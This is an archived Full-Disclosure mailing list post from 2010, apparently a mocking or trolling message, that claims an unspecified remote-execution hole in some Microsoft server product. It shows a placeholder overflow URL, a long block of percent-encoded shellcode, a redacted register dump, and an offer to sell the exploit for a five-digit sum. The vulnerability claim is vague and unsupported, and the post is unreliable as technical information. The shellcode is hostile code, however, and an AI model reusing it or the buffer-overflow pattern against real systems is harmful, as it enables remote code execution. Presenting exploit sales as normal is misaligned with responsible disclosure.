Full Disclosure mailing list archives

Vulnerability in Huge MS Server
From: musnt live <musntlive () gmail com>
Date: Mon, 14 Jun 2010 13:39:16 -0400

Hello Full-Disclosure,

I'd like to warn you about a big gaping goatse hole in one of
perhaps Microsoft's server technologies. This vulnerability could be
Silverlight, BizTalk, SharePoint or IIS server.

Gaping hole so huge, Susan Bradley might may fit through into this hole.

Example:

PoC = "http://pzwn:" + string(xxxxx,"A") + "@www.nomorefreebugs.com/"

In using supercoded technique we find remote execution. Set it and
forget it using copied code:

sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49") & _
unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%45") & _
unescape("%58%30%41%31%50%41%42%6b%42%41%55%32%42%42%32%41") & _
unescape("%41%30%41%41%58%42%38%42%42%50%75%6d%39%39%6c%6d") & _
unescape("%38%57%34%77%70%67%70%33%30%4c%4b%63%75%75%6c%6c") & _
unescape("%4b%41%6c%75%55%64%38%55%51%4a%4f%4c%4b%42%6f%46") & _
unescape("%78%4e%6b%61%4f%77%50%65%51%78%6b%63%79%4c%4b%47") & _
unescape("%44%6e%6b%47%71%48%6e%65%61%59%50%6e%79%6c%6c%4f") & _
unescape("%74%4f%30%50%74%47%77%6a%61%5a%6a%54%4d%64%41%5a") & _
unescape("%62%68%6b%4a%54%55%6b%42%74%74%64%47%74%70%75%6b") & _
unescape("%55%6c%4b%61%4f%76%44%66%61%5a%4b%71%76%6c%4b%54") & _
unescape("%4c%72%6b%4c%4b%53%6f%77%6c%56%61%7a%4b%4e%6b%65") & _
unescape("%4c%6c%4b%77%71%38%6b%6b%39%43%6c%71%34%74%44%59") & _
unescape("%53%67%41%6f%30%63%54%6e%6b%63%70%70%30%4e%65%4b") & _
unescape("%70%61%68%36%6c%6c%4b%63%70%46%6c%4c%4b%54%30%77") & _
unescape("%6c%4c%6d%6e%6b%55%38%57%78%38%6b%36%69%6e%6b%6f") & _
unescape("%70%4e%50%73%30%75%50%55%50%6e%6b%33%58%77%4c%43") & _
unescape("%6f%50%31%59%66%65%30%33%66%6e%69%69%68%4f%73%4b") & _
unescape("%70%53%4b%42%70%30%68%4a%50%6e%6a%65%54%51%4f%52") & _
unescape("%48%6f%68%4b%4e%6c%4a%66%6e%33%67%4b%4f%6d%37%51") & _
unescape("%73%50%61%62%4c%70%63%56%4e%73%55%73%48%41%75%47") & _
unescape("%70%45")


eax=xxxzzzxz ebx=xxxxx014 ecx=xxxxxc38 edx=c000ffee esi=xxxxx500 edi=xxxxx83c
eip=c000ffee esp=xxxxxxc38 ebp=xxxxxd28 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=xxxxx246
c000ffee ??              ???

Since this no is free bugs. Opening bid for multipurpose remote server
PoC affecting: I no SHARE right now -- only to serious bidder who no
blink at 5 digits before decimal.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
